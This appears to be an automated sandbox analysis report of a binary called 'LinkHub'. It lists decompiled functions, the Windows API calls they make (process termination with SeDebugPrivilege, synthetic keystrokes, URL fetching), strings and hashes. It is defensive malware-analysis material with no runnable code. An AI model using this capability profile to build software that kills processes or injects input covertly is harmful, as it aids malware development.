_free.LIBCMT ref: 00E0D435

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 18fe9915b6201315ae75c7feb3d52b62384b643d363caa9a2f682322f85f8947
Instruction ID: a4adc3bbe251b7d0159db281a08e577d314a29d7ed61645c477e9e81376a85c9
Opcode Fuzzy Hash: 18fe9915b6201315ae75c7feb3d52b62384b643d363caa9a2f682322f85f8947
Instruction Fuzzy Hash: 49613571908301AFDB21AFF8DC856AABBE4DF06324F04656DFA04B72D1DA359C808751

Function 00E65B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E65C24
ShowWindow.USER32(?,00000000), ref: 00E65C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00E65C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E65C6F

Part of subcall function 00E679F2: DeleteObject.GDI32(00000000), ref: 00E67A1E

GetWindowLongW.USER32(?,000000F0), ref: 00E65CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E65CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E65CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E65D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E65D34

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: b0ff44d929907713215ef827a762ee86ef5c6542ce3123ce9221d52608414965
Instruction ID: dc6a0048d563f6c7986a9e5ce900515c1e38d0d91e12f07c728e5f9150e42481
Opcode Fuzzy Hash: b0ff44d929907713215ef827a762ee86ef5c6542ce3123ce9221d52608414965
Instruction Fuzzy Hash: 0151E132BC0A09BFEF249F25EC49BD97BA1EB043D8F106012F614BA1E1C771A984DB51

Function 00E4CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E4CBC7
GetLastError.KERNEL32 ref: 00E4CBDA
SetEvent.KERNEL32(?), ref: 00E4CBEE

Part of subcall function 00E4CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E4CCB7
Part of subcall function 00E4CC98: GetLastError.KERNEL32 ref: 00E4CD67
Part of subcall function 00E4CC98: SetEvent.KERNEL32(?), ref: 00E4CD7B
Part of subcall function 00E4CC98: InternetCloseHandle.WININET(00000000), ref: 00E4CD86

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 560367713868622b4ac96ae8478f7d854e4a731f139345d9681aefa1f246d870
Instruction ID: 0b0e13f2ce1a5ca41dea48eb56c3bf46a47a547b3f734498629221e267789496
Opcode Fuzzy Hash: 560367713868622b4ac96ae8478f7d854e4a731f139345d9681aefa1f246d870
Instruction Fuzzy Hash: 3831B071A05701AFCB608F72ED84A67BBF8FF08744B20541DF45AA3610C730E814EB60

Function 00E32EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E34393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E343AD
Part of subcall function 00E34393: GetCurrentThreadId.KERNEL32 ref: 00E343B4
Part of subcall function 00E34393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E32F00), ref: 00E343BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00E32F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E32F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E32F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E32F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E32F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E32F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E32F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E32F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E32F74

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 43f127334c250007f283d0077e4e6e34872cdda04007f38b5e94c0ec073205ab
Instruction ID: 6f4b0c7147bf98fd58a6e15d1d405fd9482088edaa2480debf6b925db3249919
Opcode Fuzzy Hash: 43f127334c250007f283d0077e4e6e34872cdda04007f38b5e94c0ec073205ab
Instruction Fuzzy Hash: 7C01B570B882107BFB106769DC8EF5A3F99DB4EB51F500015F358BF1E0C9E16444CAAA

Function 00E32150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E31D95,?,?,00000000), ref: 00E32159
HeapAlloc.KERNEL32(00000000,?,00E31D95,?,?,00000000), ref: 00E32160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E31D95,?,?,00000000), ref: 00E32175
GetCurrentProcess.KERNEL32(?,00000000,?,00E31D95,?,?,00000000), ref: 00E3217D
DuplicateHandle.KERNEL32(00000000,?,00E31D95,?,?,00000000), ref: 00E32180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E31D95,?,?,00000000), ref: 00E32190
GetCurrentProcess.KERNEL32(00E31D95,00000000,?,00E31D95,?,?,00000000), ref: 00E32198
DuplicateHandle.KERNEL32(00000000,?,00E31D95,?,?,00000000), ref: 00E3219B
CreateThread.KERNEL32(00000000,00000000,00E321C1,00000000,00000000,00000000), ref: 00E321B5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 34e2fc1f5f1c2f60cae3678277ebeb7612693b60fba48bfbd9e5e5b7c579f325
Instruction ID: b620d858371c65e6ede4e733ff67c68c19198eaf7dc9f354eca6ae8a6d93ffd2
Opcode Fuzzy Hash: 34e2fc1f5f1c2f60cae3678277ebeb7612693b60fba48bfbd9e5e5b7c579f325
Instruction Fuzzy Hash: F701BBB5745344BFE710AFA6EC4DF6B7BACEB89751F404411FA05EB2A1CAB19804CB20

Function 00E3CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD41EA: _wcslen.LIBCMT ref: 00DD41EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E3CF99
_wcslen.LIBCMT ref: 00E3CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E3D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E3D075

Strings

,*, xrefs: 00E3CF0C
<*, xrefs: 00E3CEF6
0, xrefs: 00E3CF5A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*$0$<*
API String ID: 1227352736-815946194
Opcode ID: cfa30985ead71df01ba9e0486a826667d18b6598c1f13342f7eb0556131acbec
Instruction ID: 360bb217caa5e7cd6488b230f301c1b32e339000a02d6459254e9764e3b993cd
Opcode Fuzzy Hash: cfa30985ead71df01ba9e0486a826667d18b6598c1f13342f7eb0556131acbec
Instruction Fuzzy Hash: FF51C1716083009BD7189F28EC49BAB7FE9EF89718F041A2DF995F3191DB60D905CB62

Function 00E5AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00E3DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E3DDAC
Part of subcall function 00E3DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E3DDBA
Part of subcall function 00E3DD87: CloseHandle.KERNELBASE(00000000), ref: 00E3DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5ABCA
GetLastError.KERNEL32 ref: 00E5ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E5ACC5
GetLastError.KERNEL32(00000000), ref: 00E5ACD0
CloseHandle.KERNEL32(00000000), ref: 00E5AD21

Strings

SeDebugPrivilege, xrefs: 00E5ABEC

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 884415af51028d3b78aeb3d1decb6ccadeb87eb1888f3190474849f95f5a38ea
Instruction ID: 604bfd2152064270af76ab74cb8bc03f75a71f516c4a54fce53106f8b5dbe74b
Opcode Fuzzy Hash: 884415af51028d3b78aeb3d1decb6ccadeb87eb1888f3190474849f95f5a38ea
Instruction Fuzzy Hash: EF61B0702082419FD320DF15C894F26BBE1AF54309F5889ADE8665F7A3C771EC49CBA2

Function 00E64322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E643C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E643D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E643F0
_wcslen.LIBCMT ref: 00E64435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00E64462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E64490

Strings

SysListView32, xrefs: 00E64393

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: fd7fc42713102c20e1e3e44ce95ed5bb981fff30d682ffb18c3c53229fd683a9
Instruction ID: 904f7b4d1ed71506a41d04d5831456feddf2e8c3bb46b02f5b84355a6ebd7a1d
Opcode Fuzzy Hash: fd7fc42713102c20e1e3e44ce95ed5bb981fff30d682ffb18c3c53229fd683a9
Instruction Fuzzy Hash: 8441D2B1A40309ABDF219F64DC49BEA7BA9FF08394F101126F954F72D1D7749980CB90

Function 00E3C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E3C6C4
IsMenu.USER32(00000000), ref: 00E3C6E4
CreatePopupMenu.USER32 ref: 00E3C71A
GetMenuItemCount.USER32(019953E0), ref: 00E3C76B
InsertMenuItemW.USER32(019953E0,?,00000001,00000030), ref: 00E3C793

Strings

2, xrefs: 00E3C6FE
0, xrefs: 00E3C66F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: deb5445dd5f712754b88b48d3522b7887c16f126e69e0d6a0e4dba9bcbe9051c
Instruction ID: 3a788f1557bbe075d474935d6c619e730a101519656efc0d62bba69b04296dea
Opcode Fuzzy Hash: deb5445dd5f712754b88b48d3522b7887c16f126e69e0d6a0e4dba9bcbe9051c
Instruction Fuzzy Hash: A6517870A002059BDB10CF78D889AAEBFF8AF48318F34911AE912B6291D771D945CF61

Function 00E686FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00E68740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E68765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E6877D
GetSystemMetrics.USER32(00000004), ref: 00E687A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E4C1F2,00000000), ref: 00E687C6

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

GetSystemMetrics.USER32(00000004), ref: 00E687B1

Strings

(, xrefs: 00E68709

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (
API String ID: 2294984445-2063206799
Opcode ID: 8fba81f2a82f7b1d8b9b581bce2f1bcf7ffc19cb87d7db702806e5b13832ea34
Instruction ID: 1ad452d97220c6d288b7b1da7c10cee0da8d1367a7ec5317427ff9528f06dffc
Opcode Fuzzy Hash: 8fba81f2a82f7b1d8b9b581bce2f1bcf7ffc19cb87d7db702806e5b13832ea34
Instruction Fuzzy Hash: 3F21B071A542419FCB149F39ED08A6B37A5EB853A9F24572EF922F21E0DF70A854CB10

Function 00E3E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E3E759
gethostname.WSOCK32(?,00000100), ref: 00E3E773
gethostbyname.WSOCK32(?), ref: 00E3E780
inet_ntoa.WSOCK32(?), ref: 00E3E7C2
_strcat.LIBCMT ref: 00E3E7D0
WSACleanup.WSOCK32 ref: 00E3E7F5

Strings

0.0.0.0, xrefs: 00E3E79E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 3b7f977bf8798acde28da649a1e3074c759e5088432968a47359027c026d5553
Instruction ID: 3f2e4930da8e7670ed97f362539a5fbb9d75f9dc2832fba47cdf711364c288ac
Opcode Fuzzy Hash: 3b7f977bf8798acde28da649a1e3074c759e5088432968a47359027c026d5553
Instruction Fuzzy Hash: 76113631904218BFCB246B20EC4EEEF7BACDF00354F0110A6F601B6191EFB09A85CA70

Function 00E3F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00E3F641
_wcslen.LIBCMT ref: 00E3F652
_wcslen.LIBCMT ref: 00E3F690
_wcslen.LIBCMT ref: 00E3F6C6
_wcslen.LIBCMT ref: 00E3F6F6
_wcslen.LIBCMT ref: 00E3F706
_wcslen.LIBCMT ref: 00E3F742
_wcslen.LIBCMT ref: 00E3F771

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 301162ede91a87b9c8e5afe170cc95165062fc27f1f0cb0565860c709c4468e6
Instruction ID: 8e818fd7fc198ca3706b50abc7517b46c5a38d8084e23dce89b08942b13527b4
Opcode Fuzzy Hash: 301162ede91a87b9c8e5afe170cc95165062fc27f1f0cb0565860c709c4468e6
Instruction Fuzzy Hash: 04418365C1111CB5CB11EBB8CC8AADFB7B9EF05310F529462E618E3121FA34D255C3B6

Function 00E6379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E637B7
GetDC.USER32(00000000), ref: 00E637BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E637CA
ReleaseDC.USER32(00000000,00000000), ref: 00E637D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E63812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E63823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E66504,?,?,000000FF,00000000,?,000000FF,?), ref: 00E6385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E6387D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 33d1baf8e119995748b55263ba8c3ed4a6b29fdf63a185e93ec7f0fb83e0756b
Instruction ID: b64145a8935e84feb51af49fa23c7b82578951440bdaaf0cc9006ffd0ee37c49
Opcode Fuzzy Hash: 33d1baf8e119995748b55263ba8c3ed4a6b29fdf63a185e93ec7f0fb83e0756b
Instruction Fuzzy Hash: 9631BF72645214BFEB154F51EC89FEB3BA9EF09795F040025FE08AA191C6B59C41C7A0

Function 00E55A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00E55A8B, 00E55DE0
Not an Object type, xrefs: 00E55A64

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 48220368deb7cb9393add9301de4a7d49954ad0670ffdc3ed41d99ad65c54fe3
Instruction ID: 891db35950769a80f1b2dfd8dfb9e162c38b9ab0fbf8e08173b40fe73d645abf
Opcode Fuzzy Hash: 48220368deb7cb9393add9301de4a7d49954ad0670ffdc3ed41d99ad65c54fe3
Instruction Fuzzy Hash: D1D1C072A0070A9FDF10CF68C895AAEB7B5FF48309F149869E915BB280E770DD49CB50

Function 00E118A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E11B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E1194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E11B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E119D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E11B7B,?,00E11B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E11A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E11B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E11A7B

Part of subcall function 00E03B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DF0165,?,?,00E411D9,0000FFFF), ref: 00E03BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E11B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E11AF7
__freea.LIBCMT ref: 00E11B22
__freea.LIBCMT ref: 00E11B2E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 9fd14341032ba7dbfd6c6067af9445f9598ef041de0809377917c9815e3e7cd7
Instruction ID: 2252fbf82abca6cabd4a40ffa8c5e62920e47b7d71a51a3012dc8daefef2a05a
Opcode Fuzzy Hash: 9fd14341032ba7dbfd6c6067af9445f9598ef041de0809377917c9815e3e7cd7
Instruction Fuzzy Hash: D891E372E042569ADB208E64CC91EEEBBF9EF49354F1861A9EA11F7180E734DCC4C760

Function 00E54F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E550A5
VariantInit.OLEAUT32(?), ref: 00E551A6
VariantClear.OLEAUT32(?), ref: 00E551B0
VariantClear.OLEAUT32(?), ref: 00E5520D

Strings

